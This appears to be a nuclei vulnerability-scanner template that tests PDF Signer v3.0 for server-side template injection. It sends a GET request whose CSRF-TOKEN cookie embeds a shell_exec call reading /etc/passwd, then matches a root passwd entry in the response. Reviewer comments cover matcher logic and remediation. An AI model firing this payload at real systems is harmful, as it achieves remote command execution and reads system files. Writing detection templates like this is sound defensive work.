nuclei-templates/vulnerabilities/PDF Signer v3.0 - SSTI to R...


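# Detection template: checks whether the value of the CSRF-TOKEN cookie is
# evaluated by the server-side template engine of PDF Signer v3.0 (SSTI).
# A positive result means the cookie value reaches template rendering as
# code rather than as data, and the expression's output is reflected in the
# response body.
#
# NOTE(review): the id contains spaces. Recent nuclei releases validate ids
# as slug-style strings and may refuse to load this template; renaming it
# changes how the template is referenced, so it is left as written.
id: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie

info:
  name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    # `headers` is a mapping of header name to value, not a sequence.
    # The value is quoted so the braces and quotes inside it are always read
    # as one string.
    headers:
      # The second cookie (simcify) looks like a fixed sample session id;
      # presumably the check does not depend on it -- confirm.
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    # Require BOTH matchers. Without this the matchers are OR-ed, so any page
    # answering 200 would be reported as vulnerable (false positive).
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # Evidence of evaluation: a passwd-style root entry in the body.
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

# Triage of a positive result: the application renders request cookies
# through its template engine. The fix is to treat the CSRF token as opaque
# data (compare it, never render it). For retrospective detection, look for
# template delimiters such as `{{` inside Cookie headers in web-server logs.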